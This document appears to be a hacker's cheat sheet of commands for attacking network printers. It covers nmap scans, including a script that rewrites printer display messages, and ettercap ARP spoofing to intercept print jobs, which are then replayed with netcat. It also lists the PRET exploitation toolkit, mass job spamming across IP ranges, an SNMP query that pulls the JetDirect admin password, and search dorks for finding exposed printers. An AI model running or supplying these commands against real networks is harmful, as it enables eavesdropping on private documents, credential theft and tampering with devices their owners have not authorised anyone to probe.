.::[Nmap]::.
nmap -p 9100 --script pjl-ready-message --script-args pjl_ready_message="your message here" 192.0.2.0/24
nmap -p 9100,515,631 192.168.1.1/24 -oX printers.xml
___________
nmap -A 192.168.1.*
nmap -A -p 21,23,80,280,515,631 192.168.1.* -T insane
___________
Idlescan zombie: nmap -P0 -sI 192.168.x.x Irongeek.irongeek.com

.::[Sniffing]::.
ettercap -T -q -w print.dump -M ARP /192.168.x.x/ //
Ethereal --> print.dump
tcp.flags.syn == 1 && tcp.dstport == 9100
Follow TCP Stream --> test.job
cat test1.job|netcat -q 0 192.168.x.x 9100

.::[Tools]::.
http://hacking-printers.net/xsp/
https://github.com/RUB-NDS/PRET
./ipiterator 192.168.3.1-5,25,"cat spam.prn|netcat -q 0 ~ip 9100"
./ipiterator 192.168.1.*,25,"telnet ~ip 9100"
hpnt npi769e71|192.168.x.x "LCD Text"

.::[Printer Exploitation Toolkit]::.
pip install colorama pysnmp
pip install win_unicode_console
apt-get install imagemagick ghostscript
___________
pret.py				//Discover local printer
pret.py [-h --help] [-s --safe] [-q --quiet] [-d --debug] [-i --load FileName] [-o --log FileName] target ps|pjl|pcl

.::[URL]::.
https://192.168.x.x/DevMgmt/Email/Contacts
https://192.168.x.x:9100

.::[JetDirect Password]::.
snmpget -v 1 -c public 192.168.x.x .1.3.6.1.4.1.11.2.3.9.1.1.13.0

.::[Dork]::.
"/web/user/en/websys/webArch/mainFrame.cgi"
inurl:hp/device/this.LCDispatcher
inurl:":631/printers" -php -demo